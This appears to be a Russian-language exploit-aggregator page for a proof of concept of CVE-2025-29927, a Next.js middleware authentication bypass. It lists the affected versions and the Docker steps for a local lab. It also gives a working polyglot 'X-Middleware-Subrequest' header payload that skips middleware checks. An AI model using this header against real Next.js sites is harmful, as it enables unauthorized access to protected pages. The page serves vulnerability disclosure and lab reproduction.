## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ALIHUSSAINZADA-CVE-2025-29927-POC
# CVE-2025-29927: PoC обхода промежуточного ПО Next.js
Этот репозиторий демонстрирует уязвимость CVE-2025-29927 в Next.js, где внутренний заголовок `x-middleware-subrequest` может использоваться для обхода проверок промежуточного ПО, таких как аутентификация.
## Затронутые версии
* Next.js 15.x < 15.2.3
* Next.js 14.x < 14.2.25
* Next.js 13.x < 13.5.9
## Шаги для воспроизведения
### 1\. Клонируйте репозиторий:
root@kitploit:~
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
### 2\. Перейдите в папку проекта:
root@kitploit:~
cd CVE-2025-29927-PoC
### 3\. Сгенерируйте секрет:
root@kitploit:~
openssl rand -base64 32
### 4\. Обновите секрет в файле `.env`:
root@kitploit:~
NEXTAUTH_SECRET=your_generated_secret
### 5\. Соберите и запустите с помощью Docker:
root@kitploit:~
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
## Доказательство концепции
Мы можем значительно упростить эксплуатацию этой проблемы, используя полиглот, который позволяет эффективно охватывать различные возможные случаи. Нам удалось добиться этого с помощью следующего HTTP-заголовка, используемого для проверки наличия обхода аутентификации:
root@kitploit:~
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware


## Авторы/Источники
* Блог Next.js о CVE-2025-29927
* Исследование Zhero Web Security: Next.js и повреждённое промежуточное ПО
* Исследование Assetnote Security: анализ обхода промежуточного ПО Next.js